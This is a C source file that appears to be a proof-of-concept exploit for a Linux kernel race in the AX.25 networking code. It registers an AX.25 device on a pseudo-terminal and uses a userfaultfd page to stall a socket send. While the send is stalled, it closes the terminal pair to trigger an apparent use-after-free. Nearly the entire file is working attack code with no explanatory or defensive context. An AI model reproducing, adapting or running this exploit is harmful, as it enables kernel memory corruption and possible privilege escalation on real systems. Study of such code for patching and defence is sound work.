#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <netax25/ax25.h>
#include <poll.h>
#include <pthread.h>
#include <signal.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

#include "ptty_device.h"

int fdm, fds;

long pagesize;
int uffd;
char* uffd_addr;
void setup_uffd();

pthread_t uffd_thread;
void* uffd_main(void* arg);

int ax25_aton_entry(const char* name, char* buf);

int main() {
  int s;
  struct sockaddr_ax25 my, their;

  fdm = getmaster();
  fds = getslave(fdm);
  ax25_register(fds);
  system("ip l set dev ax0 up");
  puts("[+] ax25 device is up");

  setup_uffd();

  s = socket(AF_AX25, SOCK_DGRAM, 0);
  if (s < 0) {
    perror("socket");
    exit(1);
  }

  memset(&my, 0, sizeof(struct sockaddr_ax25));
  my.sax25_family = AF_AX25;
  ax25_aton_entry("LINUX-1", (char*)&my.sax25_call);
  my.sax25_ndigis = 0;
  if (bind(s, &my, sizeof(struct sockaddr_ax25)) < 0) {
    perror("bind");
  }

  memset(&their, 0, sizeof(their));
  their.sax25_family = AF_AX25;
  ax25_aton_entry("VK7NTK-2", (char*)&their.sax25_call);
  their.sax25_ndigis = 0;
  if (connect(s, (struct sockaddr*)&their, sizeof(their)) < 0) {
    perror("socket");
    exit(1);
  }
  puts("[+] connected");

  if (pthread_create(&uffd_thread, NULL, uffd_main, NULL) != 0) {
    perror("ptherad");
  }
  
  send(s, uffd_addr, 100, 0);
  getchar();
}

void setup_uffd() {
  struct uffdio_api uffd_api;
  struct uffdio_register uffd_reg;

  pagesize = sysconf(_SC_PAGE_SIZE);
  uffd = (int)syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
  if (uffd < 0) {
    perror("userfaultfd");
  }
  uffd_api.api = UFFD_API;
  uffd_api.features = 0;
  if (ioctl(uffd, UFFDIO_API, &uffd_api) < 0) {
    perror("ioctl#1");
  }
  uffd_addr = mmap(NULL, pagesize, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (uffd_addr == MAP_FAILED) {
    perror("mmap");
  }
  uffd_reg.range.start = (unsigned long long)uffd_addr;
  uffd_reg.range.len = pagesize;
  uffd_reg.mode = UFFDIO_REGISTER_MODE_MISSING;
  if (ioctl(uffd, UFFDIO_REGISTER, &uffd_reg) < 0) {
    perror("ioctl#2");
  }
}

void* uffd_main(void* arg) {
  char* page;

  page = mmap(NULL, pagesize, PROT_READ | PROT_WRITE,
              MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (page == MAP_FAILED) {
    perror("mmap#uffd");
  }
  while (1) {
    struct pollfd pfd;
    struct uffd_msg msg;
    struct uffdio_copy uffd_copy;
    int nready;

    pfd.fd = uffd;
    pfd.events = POLLIN;
    nready = poll(&pfd, 1, -1);
    if (nready < 0 && errno != EINTR) {
      perror("poll");
    }
    if (nready == 1 && (read(uffd, &msg, sizeof(struct uffd_msg)) > 0)) {
      if (msg.event == UFFD_EVENT_PAGEFAULT) {
        if (msg.arg.pagefault.flags & UFFD_PAGEFAULT_FLAG_WRITE) {
          perror("uffd#write");
        } else {
          close(fds);
          close(fdm);
          puts("[+] closed ptmx and pts");
          usleep(50);

          *(unsigned long int*)page = 0;
          uffd_copy.src = (unsigned long)page;
          uffd_copy.dst =
              (unsigned long)msg.arg.pagefault.address & ~(pagesize - 1);
          uffd_copy.len = pagesize;
          uffd_copy.mode = 0;
          uffd_copy.copy = 0;
          if (ioctl(uffd, UFFDIO_COPY, &uffd_copy) == -1) {
            perror("ioctl#uffd_copy");
          }
          return NULL;
        }
      }
    }
  }
  return NULL;
}

int ax25_aton_entry(const char* name, char* buf) {
  int ct = 0;
  int ssid = 0;
  const char* p = name;
  char c;

  while (ct < 6) {
    c = toupper(*p);

    if (c == '-' || c == '\0')
      break;

    if (!isalnum(c)) {
      printf("axutils: invalid symbol in callsign '%s'\n", name);
      return -1;
    }

    buf[ct] = c << 1;

    p++;
    ct++;
  }

  while (ct < 6) {
    buf[ct] = ' ' << 1;
    ct++;
  }

  if (*p != '\0') {
    p++;

    if (sscanf(p, "%d", &ssid) != 1 || ssid < 0 || ssid > 15) {
      printf(
          "axutils: SSID must follow '-' and be numeric in the range 0-15 - "
          "'%s'\n",
          name);
      return -1;
    }
  }

  buf[6] = ((ssid + '0') << 1) & 0x1E;

  return 0;
}
